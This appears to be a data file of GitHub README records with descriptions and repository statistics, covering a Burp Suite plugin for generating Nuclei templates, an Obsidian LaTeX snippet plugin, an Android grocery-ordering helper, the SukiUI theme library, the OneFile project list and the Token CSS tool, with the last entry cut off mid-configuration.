<h1 align="center"> <br> <a href="https://nuclei.projectdiscovery.io"><img src="static/nuclei-logo.png" width="200px" alt="Nuclei Burp Plugin"></a> </h1> <h4 align="center">Nuclei Template Generator Burp Plugin</h4> <p align="center"> <a href="https://discord.gg/projectdiscovery"><img src="https://img.shields.io/discord/695645237418131507.svg?logo=discord"></a> <a href="https://twitter.com/pdnuclei"><img src="https://img.shields.io/twitter/follow/pdnuclei.svg?logo=twitter"></a> </p> <p align="center"> A `Burp Suite` plugin intended to help with [`nuclei`](https://github.com/projectdiscovery/nuclei) template generation. </p> <div align="center"> <br/> <a href="https://www.youtube.com/watch?v=PMHCnaU7dfo" target="_blank"><img src="static/video_thumbnail.png" alt="Nuclei Burp Plugin Demo Video"></a> <br/><br/> <a href="https://nuclei.projectdiscovery.io" target="_blank"><img src="static/demo.gif" alt="Nuclei Burp Plugin Demo"></a> <br/><br/> <a href="https://nuclei.projectdiscovery.io" target="_blank"><img src="static/v1_1_0-demo.gif" alt="Nuclei Burp Plugin v1.1.0 Demo"></a> </div> ## Features ### Template matcher generation * `Word` and `Binary` matcher creation using selected response snippets from `Proxy` history or `Repeater` contexts * Multi-line selections are split to separate words for readability * Binary matchers are created for selections containing non-`ASCII` characters * The `part` field is auto-set based on whether the selection was in the request header or body * Every generated template auto-includes a `Status` matcher, using the `HTTP` status code of the response ### Modifying generated templates * New matchers and requests can be added to previously generated templates, by highlighting a part of a response * In case of a CVE, template information fields can be filled in automatically (Right-click on a template, Add โ†’ Classification โ†’ CVE) ### Request template generation * In the `Intruder` tab, selected payload positions can be used to generate request templates, using one of the following attack types: `Battering ram`, `Pitchfork` or `Cluster bomb` * The selected text snippet from an `HTTP` request under the `Proxy` or `Repeater` tab can be used to generate a request template with the attack type defaulting to `Battering ram` * Templates containing multiple requests can be generated by selecting multiple proxy items and clicking generate ### Template execution * Generated templates can be executed instantly, and the output is shown in the same window for convenience * The plugin auto-generates the CLI command, using the absolute nuclei path, absolute template path and target information extracted from the desired request * History of unique, executed commands are stored, can be quick searched and re-executed within the current session * CLI flag filtering and completion support can be accessed using the `CTRL + R` keyboard shorcut ### Experimental features * (Non-contextual) `YAML` property and value **auto-complete**, using reserved words from the nuclei [`JSON` schema](https://github.com/projectdiscovery/nuclei/blob/master/nuclei-jsonschema.json) * **Syntax highlighting** of `YAML` properties, based on reserved words ### Productivity * Almost every action can be triggered using keyboard shortcuts: * **F1**: open nuclei template documentation * **Ctrl + Enter**: execute current template * **Ctrl + Shift + E**: jump to the template editor * **Ctrl + L**: jump to the CLI input field * **Ctrl + R**: show CLI argument helper * **Ctrl + S**: save the current template * **Ctrl + Plus/Minus**: increase/decrease font size * **Ctrl + Q**: quit * Tab support: * **Ctrl + Tab** or **Ctrl + PageDown**: open next tab * **Ctrl + Shift + Tab** or **Ctrl + PageUp**: open previous tab * **Ctrl + [1-9]**: move to n-th tab * **Mouse Scroll Up/Down** over the tabs: navigate to next or previous tab * **Ctrl + W** or **Middle Mouse Button Click**: close current tab * The template path is auto-updated if the template is saved to a new location * The `template-id` is recommended as file name when saving ### Settings * The plugin attempts to auto-detect and complete the configuration values * The code searches for the nuclei binary path, using the values from the process's environmental `PATH` variable. **Note**: the Burp Suite binary, opposed to the stand-alone BurpSuite jar, might not have access to the current user's `PATH` variable. * The target template path is calculated based on the default nuclei template directory, configured under `<USER_HOME>/.config/nuclei/.templates-config.json` * The name of the currently logged-in operating system user is used as a default value for the template author configuration * The user can decide whether to display the generated template in a dedicated window or embedded under "Generator", within the Nuclei tab ### Look and feel * The template generator window supports Dark and Light themes. The presented theme is chosen based on the selected Burp Suite theme, under `User Options` * Support for **colored** nuclei output * Modifiable font size in the template editor and command output ## Building the code Use `mvn clean package -DskipTests` to build the project yourself. It requires Maven `3.x` and Java `11+`. On macOS the dependencies for the plugin can be met using Homebrew: `brew install mvn openjdk@11` Alternatively, different builds can be downloaded from the [Actions](https://github.com/projectdiscovery/nuclei-burp-plugin/actions) section. The built artifact can be found under the latest build's `Artifacts` section. These artifacts are generated after every commit, but are only stored for a limited amount of time. ## Installation By building the code: 1. Build the code yourself or download a pre-built/[release](https://github.com/projectdiscovery/nuclei-burp-plugin/releases) version 2. Go to `Extender` in `Burp Suite` 3. Click the `Add` button in the `Extensions` tab 4. Leave the `Extension Type` on `Java` 5. Select the path to the plugin (`.jar`) Through [BApp Store](https://portswigger.net/bappstore/526f5564b7414bfe978e650d8ea6567b): 1. Go to `Extender` in `Burp Suite` 2. Select the `BApp Store` tab 3. Search for **Nuclei Template Generator Plugin** 4. Clink on **Install** Note: this plugin does **NOT** require **Burp Suite Professional**. ## Screenshots ![Generated Word matcher on response header](static/generated_header_word_matcher_template.png "Generated Word matcher on response header") ![Generated multi-word matcher on response body](static/generated_body_multi_word_matcher_template.png "Generated multi-word matcher on response body") ![Generated request template using Battering ram](static/generated_batteringram_request_template.png "Generated request template using Battering ram") ### Credits Created with โค๏ธ by [@forgedhallpass](https://github.com/forgedhallpass) ### License Nuclei and this plugin are distributed under [MIT License](LICENSE). <h1 align="left"> <a href="https://discord.gg/projectdiscovery"><img src="static/join-discord.png" width="380" alt="Join Discord"></a> <a href="https://nuclei.projectdiscovery.io"><img src="static/check-nuclei-documentation.png" width="380" alt="Check Nuclei Documentation"></a> </h1>
Nuclei plugin for BurpSuite
null
6
36
67
171
17
5
1
artisticat1/obsidian-latex-suite
# Obsidian Latex Suite <img src="https://img.shields.io/github/manifest-json/v/artisticat1/obsidian-latex-suite"> <img src="https://img.shields.io/github/downloads/artisticat1/obsidian-latex-suite/total"> A plugin for Obsidian that aims to make typesetting LaTeX math as fast as handwriting. Inspired by [Gilles Castel's setup using UltiSnips](https://castel.dev/post/lecture-notes-1/). ![demo](https://raw.githubusercontent.com/artisticat1/obsidian-latex-suite/main/gifs/demo.gif) The plugin's main feature is **snippets**, which help you write LaTeX quicker through shortcuts and text expansion! For example, type - "sqx" instead of "\sqrt{x}" - "a/b" instead of "\frac{a}{b}" - "par x y " instead of "\frac{\partial x}{\partial y}" See [Gilles Castel's writeup](https://castel.dev/post/lecture-notes-1/) for more information. The plugin comes with a [set of default snippets](https://github.com/artisticat1/obsidian-latex-suite/blob/main/src/default_snippets.js), loosely based on [Gilles Castel's](https://castel.dev/post/lecture-notes-1/#other-snippets). You can modify them, remove them, and write your own. ## Usage To get started, type "dm" to enter display math mode. Try typing the following: - "xsr" โ†’ "x^{2}". - "x/y <kbd>Tab</kbd>" โ†’ "\\frac{x}{y}". - "sin @t" โ†’ "\\sin \\theta". **Have a look at the [cheatsheet](#cheatsheet)** for a list of commonly used default snippets. Once these feel familiar, you can check out the [default snippets](https://github.com/artisticat1/obsidian-latex-suite/blob/main/src/default_snippets.js) for more commands. e.g. - "par <kbd>Tab</kbd> f <kbd>Tab</kbd> x <kbd>Tab</kbd>" โ†’ "\\frac{\\partial f}{\\partial x}". - "dint <kbd>Tab</kbd> 2pi <kbd>Tab</kbd> sin @t <kbd>Tab</kbd> @t <kbd>Tab</kbd>" โ†’ "\\int_{0}^{2\pi} \\sin \\theta \\, d\\theta". You can also add your own snippets! [See here for more info on writing snippets](#snippets). You can [view snippets written by others and share your own snippets here](https://github.com/artisticat1/obsidian-latex-suite/discussions/50). ## Features ### Auto-fraction Lets you type "1/x" instead of "\frac{1}{x}". For example, it makes the following expansions: - `x/` โ†’ `\frac{x}{}` - `(a + b(c + d))/` โ†’ `\frac{a + b(c + d)}{}` and moves the cursor inside the brackets. Once done typing the denominator, press <kbd>Tab</kbd> to exit the fraction. ![auto-fraction](https://raw.githubusercontent.com/artisticat1/obsidian-latex-suite/main/gifs/auto-fraction.gif) ### Matrix shortcuts While inside a matrix, array, align, or cases environment, - Pressing <kbd>Tab</kbd> will insert the "&" symbol - Pressing <kbd>Enter</kbd> will insert "\\\\" and move to a new line - Pressing <kbd>Shift + Enter</kbd> will move to the end of the next line (can be used to exit the matrix) ![matrix shortcuts](https://raw.githubusercontent.com/artisticat1/obsidian-latex-suite/main/gifs/matrix_shortcuts.gif) ### Conceal *This feature must be enabled in settings!* Make your equations more readable by hiding LaTeX code, instead rendering it in a pretty format. For example, "\dot{x}^{2} + \dot{y}^{2}" will be displayed as "แบ‹ยฒ + แบยฒ". To reveal the LaTeX code, move the cursor over it. ![conceal demo](https://raw.githubusercontent.com/artisticat1/obsidian-latex-suite/main/gifs/conceal.png) ![conceal demo 2](https://raw.githubusercontent.com/artisticat1/obsidian-latex-suite/main/gifs/conceal.gif) ### Tabout - Pressing <kbd>Tab</kbd> while the cursor is at the end of an equation will move the cursor outside the $ symbols. - Otherwise, pressing <kbd>Tab</kbd> will advance the cursor to the next closing bracket: ), ], }, >, or |. ### Preview inline math When the cursor is inside inline math, a popup window showing the rendered math will be displayed. <img width=500 src="https://raw.githubusercontent.com/artisticat1/obsidian-latex-suite/main/gifs/inline_math_preview_1.png"> <img width=650 src="https://raw.githubusercontent.com/artisticat1/obsidian-latex-suite/main/gifs/inline_math_preview_2.png"> ### Color & highlight matching brackets - Matching brackets are rendered in the same color, to help with readability. - When the cursor is adjacent to a bracket, that bracket and its pair will be highlighted. - When the cursor is inside brackets, the enclosing brackets will be highlighted. ![color and highlight matching brackets demo](https://raw.githubusercontent.com/artisticat1/obsidian-latex-suite/main/gifs/color_brackets.gif) ### Visual snippets Sometimes you want to annotate math, or cancel or cross out terms. Selecting some math with the cursor and typing - "U" will surround it with "\\underbrace". - "O" will surround it with "\\overbrace". - "C" will surround it with "\\cancel". - "K" will surround it with "\\cancelto". - "B" will surround it with "\\underset". ![visual snippets](https://raw.githubusercontent.com/artisticat1/obsidian-latex-suite/main/gifs/visual_snippets.gif) ### Auto-enlarge brackets When a snippet containing "\\sum", "\\int" or "\\frac" is triggered, any enclosing brackets will be enlarged with "\\left" and "\\right". ![auto-enlarge brackets](https://raw.githubusercontent.com/artisticat1/obsidian-latex-suite/main/gifs/auto-enlarge_brackets.gif) ### Editor commands - Box current equation โ€“ surround the equation the cursor is currently in with a box. - Select current equation โ€“ select the equation the cursor is currently in. ### Snippets Snippets are formatted as follows: ```typescript { trigger: string | RegExp, replacement: string, options: string, priority?: number, description?: string, flags?: string, } ``` - `trigger` : The text that triggers this snippet. - Triggers can also be regular expressions. [See here for more info.](./DOCS.md#regex-snippets) - `replacement` : The text to replace the `trigger` with. - Replacements can also be JavaScript functions. [See here for more info.](./DOCS.md#function-snippets) - `options` : See below. - `priority` (optional): This snippet's priority. Snippets with higher priority are run first. Can be negative. Defaults to 0. - `description` (optional): A description for this snippet. - `flags` (optional): Flags for regex snippets. #### Options - `t` : Text mode. Only run this snippet outside math - `m` : Math mode. Only run this snippet inside math. Shorthand for both `M` and `n` - `M` : Block math mode. Only run this snippet inside a `$$ ... $$` block - `n` : Inline math mode. Only run this snippet inside a `$ ... $` block - `A` : Auto. Expand this snippet as soon as the trigger is typed. If omitted, the <kbd>Tab</kbd> key must be pressed to expand the snippet - `r` : [Regex](./DOCS.md#regex-snippets). The `trigger` will be treated as a regular expression - `v` : [Visual](./DOCS.md#visual-snippets). Only run this snippet on a selection. The trigger should be a single character - `w` : Word boundary. Only run this snippet when the trigger is preceded (and followed by) a word delimiter, such as `.`, `,`, or `-`. - `c` : Code mode. Only run this snippet inside a ```` ``` ... ``` ```` block Insert **tabstops** for the cursor to jump to by writing "$0", "$1", etc. in the `replacement`. For more details on writing snippets, including **regex** snippets and **function** snippets, [see the **documentation** here](DOCS.md). You can [view snippets written by others and share your own snippets here](https://github.com/artisticat1/obsidian-latex-suite/discussions/50). > [!WARNING] > Snippet files are interpreted as JavaScript and can execute arbitrary code. > Always be careful with snippets shared from others to avoid running malicious code. ## Cheatsheet | Trigger | Replacement | | ------------------ | ---------------- | | mk | \$ \$ | | dm | \$\$<br><br>\$\$ | | sr | ^{2} | | cb | ^{3} | | rd | ^{ } | | \_ | \_{ } | | sq | \\sqrt{ } | | x/y <kbd>Tab</kbd> | \\frac{x}{y} | | // | \\frac{ }{ } | | " | \\text{ } | | text | \\text{ } | | x1 | x_{1} | | x,. | \\mathbf{x} | | x., | \\mathbf{x} | | xdot | \\dot{x} | | xhat | \\hat{x} | | xbar | \\bar{x} | | xvec | \\vec{x} | | xtilde | \\tilde{x} | | xund | \\underline{x} | | ee | e^{ } | | invs | ^{-1} | When running a snippet that **moves the cursor inside brackets {}, press <kbd>Tab</kbd> to exit the brackets**. ### Greek letters | Trigger | Replacement | Trigger | Replacement | | ------- | ------------ | ------- | ----------- | | @a | \\alpha | eta | \\eta | | @b | \\beta | mu | \\mu | | @g | \\gamma | nu | \\nu | | @G | \\Gamma | xi | \\xi | | @d | \\delta | Xi | \\Xi | | @D | \\Delta | pi | \\pi | | @e | \\epsilon | Pi | \\Pi | | :e | \\varepsilon | rho | \\rho | | @z | \\zeta | tau | \\tau | | @t | \\theta | phi | \\phi | | @T | \\Theta | Phi | \\Phi | | @k | \\kappa | chi | \\chi | | @l | \\lambda | psi | \\psi | | @L | \\Lambda | Psi | \\Psi | | @s | \\sigma | | | | @S | \\Sigma | | | | @o | \\omega | | | | ome | \\omega | | | For greek letters with short names (2-3 characters), just type their name, e.g. "pi" โ†’ "\\pi" ## Contributing Any contributions and PRs are welcome! ## Acknowledgements - [@tth05](https://github.com/tth05)'s [Obsidian Completr](https://github.com/tth05/obsidian-completr) for the basis of the tabstop code - [Dynamic Highlights](https://github.com/nothingislost/obsidian-dynamic-highlights/blob/master/src/settings/ui.ts) for reference - [Quick Latex for Obsidian](https://github.com/joeyuping/quick_latex_obsidian) for inspiration ## Support If you like this plugin and want to say thanks, you can buy me a coffee here! <a href='https://ko-fi.com/J3J6BBZAW' target='_blank'><img height='56' style='border:0px;height:56px;' src='https://cdn.ko-fi.com/cdn/kofi1.png?v=3' border='0' alt='Buy Me a Coffee at ko-fi.com' /></a>
Make typesetting LaTeX as fast as handwriting through snippets, text expansion, and editor enhancements
latex,obsidian,obsidian-plugin,snippets,math,obsidian-md,text-expansion
55
17
43
606
99
1
1
Skykai521/DingDongHelper
# DingDongHelper ### ๅฎๅ’šไนฐ่œๆŠข่œๆ’ไปถ Only support Android ### ้‡่ฆๆ็คบ **1. ๆ’ไปถๆฏ”ๆ‰‹ๅŠจไธ‹ๅ•ๆ›ดๆ…ข๏ผŒไธๆŽจ่ๅœจ้ซ˜ๅณฐๆœŸไฝฟ็”จ๏ผŒๅฏไปฅๅœจ้ซ˜ๅณฐๆœŸ่ฟ‡ๅŽๅฐ่ฏ•๏ผŒไฝ†ไนŸๆ— ๆณ•ไฟ่ฏ100%ไธ‹ๅ•ๆˆๅŠŸใ€‚** **2. ๆ’ไปถไธไฟ่ฏๅ…ผๅฎนๆ‰€ๆœ‰ๆœบๅž‹ไธŽๅฎ‰ๅ“็‰ˆๆœฌ๏ผŒๅฆ‚ๆžœๅ‘็Žฐๆ— ๆณ•ไฝฟ็”จ๏ผŒ่ฏทๅŠๆ—ถๅธ่ฝฝใ€‚** ### ไธ‹่ฝฝ 1. [https://github.com/Skykai521/DingDongHelper/blob/main/app/release/app-release.apk](https://github.com/Skykai521/DingDongHelper/blob/main/app/release/app-release.apk) 2. ๅ…ณๆณจๅ…ฌไผ—ๅท๏ผš**SkyKai** ใ€‚ๅ›žๅค๏ผš**ๅฎๅ’šๅŠฉๆ‰‹** ### ็‰ˆๆƒ่ฏดๆ˜Ž **ๆœฌ้กน็›ฎไธบ GPL3.0 ๅ่ฎฎ๏ผŒ่ฏทๆ‰€ๆœ‰่ฟ›่กŒไบŒๆฌกๅผ€ๅ‘็š„ๅผ€ๅ‘่€…้ตๅฎˆ GPL3.0ๅ่ฎฎ๏ผŒๅนถไธ”ไธๅพ—ๅฐ†ไปฃ็ ็”จไบŽๅ•†็”จใ€‚**
ๅฎๅ’šไนฐ่œๆŠข่œๆ’ไปถ
null
0
2
1
10
0
1
0
kikipoulet/SukiUI
<div id="header" align="center"> <img src="https://raw.githubusercontent.com/kikipoulet/SukiUI/main/Images/OIG.N5o-removebg-preview.png" ></img> <h3>Suki UI</h3> <h4><i>A Desktop UI Library for <a href="https://avaloniaui.net/">Avalonia</a></i></h4> <div id="badges" > <a href="https://github.com/kikipoulet/SukiUI/wiki/1.-Installation"><img src="https://img.shields.io/badge/GET%20STARTED-purple?style=for-the-badge" alt="Get Started"/></a> <a href="https://www.nuget.org/packages/SukiUI"><img src="https://img.shields.io/nuget/vpre/SukiUI?style=for-the-badge" alt="Nuget Pre"/></a> <a href="https://github.com/kikipoulet/SukiUI/blob/main/LICENSE"><img src="https://img.shields.io/github/license/kikipoulet/SukiUI?style=for-the-badge" alt="License"/></a> </div> </div> <br/> #### Try our Controls Gallery App on Microsoft Store ! <span> <a href="https://apps.microsoft.com/detail/9NM01BJ6JTTF?hl=en-us&gl=US"> <img src="https://get.microsoft.com/images/en-us%20light.svg" alt="Download SukiUI Controls Gallery" /> </a> </span> <br/> <br/> ### โœจ Upcoming : Use [Dock](https://github.com/wieslawsoltes/Dock) library with SukiUI ! <br/> ![image](https://github.com/kikipoulet/SukiUI/assets/19242427/0b4af54b-9903-4df5-9ca1-6577c878d477) Credits to @wieslawsoltes for the Dock library. <br/> ## ๐Ÿ“„ Documentation [Wiki](https://github.com/kikipoulet/SukiUI/wiki) [SukiUI Documentation](https://kikipoulet.github.io/SukiUI/) *Work in Progress* ๐Ÿš€ <br/><br/> ## ๐Ÿ“ฑ UI Theme ##### SukiUI contains a theme for AvaloniaUI's base controls with support for Light/Dark themes. ##### SukiUI offers the ability to choose and switch between different color themes, as well as create custom ones. ![colorthemes](https://github.com/kikipoulet/SukiUI/assets/19242427/72c4cc35-876c-47ec-8205-cf6a37be1c59) ## ๐Ÿ•น Rich Animations ##### SukiUI places special emphasis on creating rich and intuitive animations for the themed controls. <kbd> <img src="https://github.com/kikipoulet/SukiUI/assets/19242427/40c93232-c45a-4dd7-b559-e8e22cff9748" ></img> </kbd> <kbd> <img src="https://github.com/kikipoulet/SukiUI/assets/19242427/36b1a516-2f16-4d0d-82b2-df59003e2ec6" ></img> </kbd> ## ๐Ÿ”จ Additional Controls ##### SukiUI contains additional controls to offer the possibility to make rich and diversified User Interface. <kbd> <img src="https://github.com/kikipoulet/SukiUI/assets/19242427/0499e9bb-2187-4c52-bbe2-ac38260dabfa" ></img> </kbd> <kbd> <img src="https://github.com/kikipoulet/SukiUI/assets/19242427/0dc7a093-408e-4560-b57a-07d427f64f86" ></img> </kbd> <kbd> <img src="https://github.com/kikipoulet/SukiUI/assets/19242427/88095be5-565c-4aa2-bddc-ee040ea67ebe" ></img> </kbd> <kbd> <img src="https://github.com/kikipoulet/SukiUI/assets/19242427/ac1f43e2-f7cd-4ac7-b64d-e83b5952b019" ></img> </kbd> <kbd> <img src="https://github.com/kikipoulet/SukiUI/assets/19242427/a07a5a38-eccf-47a0-b992-abc41d7ee70d" ></img> </kbd> ## โš’ UI Functionalities ##### SukiUI offer an easy way to display Dialog and Notifications in your application. <kbd> <img src="https://github.com/kikipoulet/SukiUI/assets/19242427/b29ae757-9d6a-461a-bd6f-6949c3f0ccec" ></img> </kbd> <kbd> <img src="https://github.com/kikipoulet/SukiUI/assets/19242427/60b7d946-e7b1-42b8-8aca-487f92a50ac2" ></img> </kbd>
UI Theme for AvaloniaUI
null
1
15
102
827
11
2
2
521xueweihan/OneFile
# OneFile <p align="center"> <img src="https://cdn.jsdelivr.net/gh/521xueweihan/img_logo@main/logo/onefile.png"/> <br>็”จไธ€ไธชๆ–‡ไปถ๏ผŒๆƒŠ่‰ณๆ‰€ๆœ‰ไบบ๏ผ </p> <p align="center"> <a href="https://cdn.jsdelivr.net/gh/521xueweihan/img_logo@main/logo/weixin.png"><img src="https://img.shields.io/badge/Talk-%E5%BE%AE%E4%BF%A1%E7%BE%A4-brightgreen.svg?style=popout-square" alt="WeiXin"></a> <a href="https://github.com/521xueweihan/OneFile/stargazers"><img src="https://img.shields.io/github/stars/521xueweihan/OneFile.svg?style=popout-square" alt="GitHub stars"></a> <a href="https://weibo.com/hellogithub"><img src="https://img.shields.io/badge/%E6%96%B0%E6%B5%AA-Weibo-red.svg?style=popout-square" alt="Sina Weibo"></a> </p> ## ไป‹็ป OneFile ๆฑ‡้›†ไบ†ไธ€ไธชๆ–‡ไปถใ€่ฟ่กŒ็ฎ€ๅ•ใ€ไธ€็œ‹ๅฐฑๆ‡‚็š„ๅผ€ๆบ้กน็›ฎใ€‚ๅŒ…ๆ‹ฌๆธธๆˆใ€็ผ–่ฏ‘ๅ™จใ€ๆœๅŠกๅ™จใ€ๅทฅๅ…ทใ€ๅฎž็”จๅบ“็ญ‰๏ผŒๅฎƒไปฌ็ฎ€ๅ•ๆœ‰่ถฃ**ๅคๅˆถไปฃ็ ๅฐฑ่ƒฝ่ท‘**๏ผŒ่ƒฝๅคŸ่ฎฉไฝ ็žฌ้—ดๆ‰พๅˆฐ็ผ–็จ‹็š„ไน่ถฃใ€็จ‹ๅบ่ฟ่กŒๆˆๅŠŸ็š„ๅฟซไน๏ผ ## ้กน็›ฎ [็‚นๅ‡ปๅŠ ๅ…ฅ](https://github.com/521xueweihan/OneFile/blob/main/doc/join.md) OneFile ็ผ–็จ‹ๆŒ‘ๆˆ˜๏ผŒๅ†™ไฝ ๆ„Ÿๅ…ด่ถฃ็š„ไปฃ็ ใ€‚ๅ‚ไธŽๅผ€ๆบๅช้œ€ไธ€ไธชๆ–‡ไปถ๏ผŒ[็‚นๅ‡ป](https://hellogithub.yuque.com/forms/share/4f0bf06b-2991-4f7e-a860-5b76337b7b5b) ๆไบคไฝ ็š„ไปฃ็ ๅงใ€‚ | ๅ็งฐ | ่ฏญ่จ€ | ๆ่ฟฐ | ๆ“ไฝœ | | ------- | ----- | ------------ | --------- | | [tinyhttpd](https://github.com/EZLippi/Tinyhttpd) | C | ไธๅˆฐ 500 ่กŒ็š„่ถ…่ฝป้‡ๅž‹ HTTP Server... | [ๆบ็ ](https://hellogithub.com/onefile/code/7e574fc7d58d4fae950a95d7bdb87d09) | | [si78c](https://github.com/loadzero/si78c) | C | ็”จ C ่ฏญ่จ€ๅฎž็Žฐ็š„ใ€Šๅคช็ฉบไพต็•ฅ่€…ใ€‹ๅ‘ฝไปค่กŒๆธธๆˆ | [ๆบ็ ](https://hellogithub.com/onefile/code/cb8e4fbc5a174664ac325a521ee6d02f) | | [minilisp](https://github.com/rui314/minilisp) | C | ็”จ C ่ฏญ่จ€ๅ†™็š„ Lisp ่งฃ้‡Šๅ™จใ€‚ๅฎž็Žฐไบ†ๆ•ดๆ•ฐใ€็ฌฆ... | [ๆบ็ ](https://hellogithub.com/onefile/code/9a51afad2a7e49fb8dd79136866674f4) | | [cJSON](https://github.com/DaveGamble/cJSON) | C | ๆ ‡ๅ‡† C(C89) ๅฎž็Žฐ็š„่ถ…่ฝป้‡็š„ JSON ่งฃๆž... | [ๆบ็ ](https://hellogithub.com/onefile/code/2f497887abdb44879e3d523981dae933) | | [filedb](https://github.com/LiuYuguang/supersimplefiledatabase) | C | ๅŸบไบŽB-tree ็š„ๆ–‡ไปถๆ•ฐๆฎๅบ“ | [ๆบ็ ](https://hellogithub.com/onefile/code/3ed05321bf5f483dbdcbea636ca4b914) | | [threadpoll](https://github.com/progschj/ThreadPool) | C++ | ไธ€ไธช็ฎ€ๅ•็š„ C++11 ็บฟ็จ‹ๆฑ ๅฎž็Žฐ | [ๆบ็ ](https://hellogithub.com/onefile/code/d0c3498b528f485996c9dc5dc4dfa4cb) | | [minesweeper](https://github.com/521xueweihan/OneFile/blob/main/src/html/minesweeper.html) | HTML | ๆ‰ซ้›ทๆธธๆˆ | [่ฏ•็Žฉ](https://hellogithub.com/onefile/demo/e235d1d133134aea93ca6cdf2ed4fc5d.html) | | [2048](https://github.com/521xueweihan/OneFile/blob/main/src/html/2048.html) | HTML | 2048 ๆธธๆˆ | [่ฏ•็Žฉ](https://hellogithub.com/onefile/demo/8d627fe4cfa540b19dcd04d4327cf26c.html) | | [ascii-cam](https://github.com/521xueweihan/OneFile/blob/main/src/html/ascii-cam.html) | HTML | ๆŠŠ่ง†้ข‘ๅ›พๅƒ่ฝฌๆˆ ascii | [่ฏ•็Žฉ](https://hellogithub.com/onefile/demo/126093303b6b414dbab9d623c957fdd4.html) | | [looptap](https://github.com/vasanthv/looptap) | HTML | ๆถˆ็ฃจๆ—ถ้—ด็š„ๅฐๆธธๆˆ๏ผŒๆŠŠ็ƒๅœๅœจๆœ‰้ขœ่‰ฒๅŒบๅŸŸ | [่ฏ•็Žฉ](https://hellogithub.com/onefile/demo/cc759276aefe4bad87ac259940042581.html) | | [the-super-tiny-compiler](https://github.com/jamiebuilds/the-super-tiny-compiler) | JavaScript | ไบบไบบ้ƒฝ่ƒฝ็œ‹ๆ‡‚็š„ๅพฎๅž‹็ผ–่ฏ‘ๅ™จ | [ๆบ็ ](https://hellogithub.com/onefile/code/b4c7642fae544a0f8e7bc8e4d9971d52) | | [pico](https://github.com/nenadmarkus/picojs) | JavaScript | 200 ่กŒๅฎž็Žฐ็š„้ข้ƒจ่ฏ†ๅˆซๅบ“ | [ๆบ็ ](https://hellogithub.com/onefile/code/2bcbe06dbcbb48078f2307379068e6e6) | | [parsedown](https://github.com/erusev/parsedown) | PHP | ไธ€ไธชๅฐ่€Œ็พŽ็š„ PHP ็š„ Markdown ่งฃๆžๅบ“ | [ๆบ็ ](https://hellogithub.com/onefile/code/12026fcae79e4cc08793246b5b55817a) | | [httpstat](https://github.com/reorx/httpstat) | Python | ็”จๆ›ดไผ˜้›…็š„ๆ–นๅผๅฑ•็คบ curl ็ป“ๆžœ็š„ๅ‘ฝไปค่กŒๅทฅๅ…ท | [ๆบ็ ](https://hellogithub.com/onefile/code/7c6847a33f1245608ae9abf4e59a03b8) | | [py2sec](https://github.com/cckuailong/py2sec) | Python | ไธ€ๆฌพ่ฝป้‡็บง่ทจๅนณๅฐ Python โ€œๅŠ ๅฏ†โ€ใ€ๅŠ ้€Ÿ็š„่„š... | [ๆบ็ ](https://hellogithub.com/onefile/code/3e608cc323e84f15887461f1d3e71677) | | [tomato-clock](https://github.com/coolcode/tomato-clock) | Python | Python ๅ†™็š„ๅ‘ฝไปค่กŒ็•ช่Œ„ๅทฅไฝœๆณ•ๅฎšๆ—ถๅ™จ | [ๆบ็ ](https://hellogithub.com/onefile/code/05d586dfd389413da47ffdbc806196cc) | | [share](https://github.com/beavailable/share) | Python | ๅŸบไบŽ HTTP ๅ่ฎฎ็š„ๆ–‡ไปถๅˆ†ไบซๅทฅๅ…ท | [ๆบ็ ](https://hellogithub.com/onefile/code/9b3c14d37aa5434182244de6ad947b97) | | [web-server](https://github.com/521xueweihan/OneFile/blob/main/src/python/web-server.py) | Python | ไธ€ไธช็ฎ€ๅ•็š„ Web ๆก†ๆžถ | [ๆบ็ ](https://hellogithub.com/onefile/code/96c0137112cf4d15af8008f99d793a1a) | ## ๆ›ดๆ–ฐ่ฎกๅˆ’ - ๅขžๅŠ ๆŠ•็ฅจ - ๅขž่ฎพๅฅ–้‡‘๏ผˆ่ตžๅŠฉ่ฏท<a href="mailto:595666367@qq.com">่”็ณปๆˆ‘</a>๏ผ‰ - ่‹ฑๆ–‡ๆ่ฟฐ ## ๅฃฐๆ˜Ž <a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/deed.zh"><img alt="็Ÿฅ่ฏ†ๅ…ฑไบซ่ฎธๅฏๅ่ฎฎ" style="border-width: 0" src="https://licensebuttons.net/l/by-nc-nd/4.0/88x31.png"></a><br>ๆœฌไฝœๅ“้‡‡็”จ <a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/deed.zh">็ฝฒๅ-้žๅ•†ไธšๆ€งไฝฟ็”จ-็ฆๆญขๆผ”็ปŽ 4.0 ๅ›ฝ้™…</a> ่ฟ›่กŒ่ฎธๅฏใ€‚
ๅชๆœ‰ไธ€ไธชๆ–‡ไปถ๏ผ
null
0
5
10
43
0
1
0
tokencss/tokencss
# Token CSS Token CSS is a new tool that seamlessly integrates [Design Tokens](https://design-tokens.github.io/community-group/format/#design-token) into your development workflow. Conceptually, it is similar to tools like [Tailwind](https://tailwindcss.com), [Styled System](https://styled-system.com/), and many CSS-in-JS libraries that provide tokenized _constraints_ for your styles&mdash;but there's one big difference. **Token CSS embraces `.css` files and `<style>` blocks.** ## Installation Building your site with [Astro](https://astro.build)? Use the official Astro integration. ```shell npm run astro add @tokencss/astro ``` Otherwise, install `@tokencss/postcss` and add it to your PostCSS configuration. ```shell npm install @tokencss/postcss ``` ```js const tokencss = require("@tokencss/postcss"); module.exports = { plugins: [tokencss()], }; ``` ## Configuration Create a `token.config.json` file in the root of your project&mdash;the `@tokencss/postcss` plugin will automatically pick this up. > **Warning**: It is intended that this file will follow the final [Design Tokens Format Module](https://design-tokens.github.io/community-group/format/), but we are currently following an older draft version of the spec. Expect breaking changes as we attempt to stay in sync with the latest version! You may either extend our built-in [Preset](https://github.com/tokencss/tokencss/blob/main/packages/core/preset/token.config.json)... ```json { "$schema": "https://tokencss.com/schema@0.0.1", "extends": ["@tokencss/core/preset"] } ``` Or create your own file from scratch. ```json { "$schema": "https://tokencss.com/schema@0.0.1", "extends": ["@tokencss/core"], "color": { "gray": { "0": { "value": "#f8f9fa" }, "1": { "value": "#f1f3f5" }, "2": { "value": "#e9ecef" }, "3": { "value": "#dee2e6" }, "4": { "value": "#ced4da" }, "5": { "value": "#adb5bd" }, "6": { "value": "#868e96" }, "7": { "value": "#495057" }, "8": { "value": "#343a40" }, "9": { "value": "#212529" } } }, "space": { "2xs": { "value": ".25rem" }, "xs": { "value": ".5rem" }, "sm": { "value": "1rem" }, "md": { "value": "1.25rem" }, "lg": { "value": "1.5rem" }, "xl": { "value": "1.75rem" 